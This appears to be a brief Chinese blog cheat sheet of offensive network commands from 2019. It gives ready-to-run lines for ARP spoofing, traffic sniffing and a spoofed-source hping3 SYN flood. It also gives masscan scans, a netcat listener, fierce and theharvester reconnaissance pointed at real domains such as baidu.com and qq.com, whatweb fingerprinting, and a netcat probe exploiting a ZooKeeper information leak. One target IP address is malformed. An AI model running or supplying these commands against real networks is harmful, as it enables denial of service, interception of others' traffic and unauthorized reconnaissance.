ARP欺骗:arpspoof -i eth0 -t 192.168.185 192.168.1.1

嗅探工具:ettercap -Tq -i eth0

SYN Flood攻击(ddos分布式拒绝服务攻击):hping3 -q -n -a 2.2.2.2 -S -s 53 --keep -p 445 --flood 192.168.1.138

  hping3 -q -n -a 伪造源IP -S -s 伪造源端口 --keep -p 目的端口 --flood 目的IP

masscan -p80 192.168.1.112/24 扫描端口工具

监听80端口 nc -lvp 80

域名综合性扫描工具  fierce -dns baidu.com -threads 200

从百度(baidu)搜索引擎中的前200项搜索结果中挖掘目标域里的电子邮件地址和主机名

  theharvester -d qq.com -l 200 -b baidu

 

  -l限制并发搜索结果

 

  -b指定搜索引擎(google,pgp,bing,linkedin,baidu等)

 

  -d指定搜索对象

 

  -h使用Shodan数据库去搜索主机

whatweb -i /root/test.txt(必须为域名)  --log-xml=baidu.xml

pwd 查看当前目录

echo envi | nc ip 2181  用于利用zookeeper漏洞

 

 masscan -p80 172.30.12.6/24 -oL 80.txt;sed '/^#[\w.]*/d' 80.txt | awk '{print $4":"$3}' > - | whatweb -i - 

 awk '{print $1}' data2.txt

 nikto dirbuster

posted on 2019-07-27 11:48  邓阮叶  阅读(1056)  评论(0)    收藏  举报